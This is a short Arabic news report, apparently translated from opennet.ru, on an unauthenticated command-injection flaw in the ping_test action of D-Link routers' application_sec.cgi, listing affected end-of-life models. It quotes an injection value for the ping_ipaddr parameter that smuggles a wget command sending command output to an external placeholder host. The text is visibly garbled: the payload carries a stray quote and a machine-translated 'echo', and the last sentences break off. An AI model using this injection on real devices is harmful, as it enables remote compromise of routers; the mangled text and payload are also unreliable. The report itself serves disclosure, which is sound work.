في أجهزة التوجيه اللاسلكية D-Link
ومن المثير للاهتمام، وفقًا لمطوري البرامج الثابتة، أن استدعاء "ping_test" يجب أن يتم تنفيذه فقط بعد المصادقة، ولكن في الواقع يتم استدعاؤه على أي حال، بغض النظر عن تسجيل الدخول إلى واجهة الويب. على وجه الخصوص، عند الوصول إلى البرنامج النصي application_sec.cgi وتمرير المعلمة "action=ping_test"، يقوم البرنامج النصي بإعادة التوجيه إلى صفحة المصادقة، ولكنه في نفس الوقت ينفذ الإجراء المرتبط بـ ping_test. لتنفيذ التعليمات البرمجية، تم استخدام ثغرة أمنية أخرى في ping_test نفسها، والتي تستدعي أداة ping المساعدة دون التحقق بشكل صحيح من صحة عنوان IP الذي تم إرساله للاختبار. على سبيل المثال، لاستدعاء الأداة المساعدة wget ونقل نتائج الأمر "echo 1234" إلى مضيف خارجي، ما عليك سوى تحديد المعلمة "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" test.test/?$(صدى 1234)".
وقد تم تأكيد وجود الثغرة رسميًا في النماذج التالية:
- DIR-655 مع البرنامج الثابت 3.02b05 أو أقدم؛
- DIR-866L مع البرامج الثابتة 1.03b04 أو أقدم؛
- DIR-1565 مع البرامج الثابتة 1.01 أو أقدم؛
- DIR-652 (لا تتوفر معلومات حول إصدارات البرامج الثابتة التي بها مشكلات)
لقد انتهت بالفعل فترة الدعم لهذه النماذج، لذا D-Link
واكتشف لاحقًا أن الثغرة كانت أيضًا
المصدر: opennet.ru